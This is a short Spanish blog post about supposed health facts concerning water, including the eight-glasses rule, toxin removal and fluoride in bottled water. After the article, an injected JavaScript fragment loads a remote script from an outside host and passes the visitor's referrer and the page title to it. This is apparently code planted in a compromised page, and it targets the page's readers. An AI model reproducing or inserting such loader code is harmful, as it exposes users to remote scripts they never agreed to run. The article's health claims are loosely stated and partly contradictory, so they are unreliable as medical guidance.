Salud y belleza » Dieta, Productos naturales, Salud

Curiosidades sobre el agua relacionadas con tu salud

Sin Comentarios

Todos necesitamos agua para sobrevivir, es esencial para nuestro organismo. Pero algunos desconocen las verdaderas propiedades de este líquido fundamental. Por eso hoy queremos centrarnos en desvelarte algunas curiosidades sobre el agua para que conozcas mejor sus beneficios.

beneficios-del-agua

- Ocho vasos de agua al día: el agua es fácil de encontrar y además es un producto muy económico. Sin embargo, muchas personas no consumen los ocho vasos de agua al día, o dos litros, que recomiendan los expertos. Aunque este líquido también lo podemos encontrar al comer frutas y verduras.

- El agua ayuda a eliminar toxinas del cuerpo: es un mito totalmente cierto. El agua no tiene por qué neutralizar las toxinas pero los riñones usan el agua para expulsar algunos residuos corporales. Si no consumes suficiente agua el cuerpo retendría las toxinas en vez de expulsarlas.

- Agua embotellada: el agua embotellada a menudo no contiene flúor (un oligoelemento), por lo que contribuiría a la formación de caries por la falta de flúor que hace que los dientes se vuelvan más susceptibles.

¿Conocías estas curiosidades sobre el agua?

d.getElementsByTagName('head')[0].appendChild(s);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.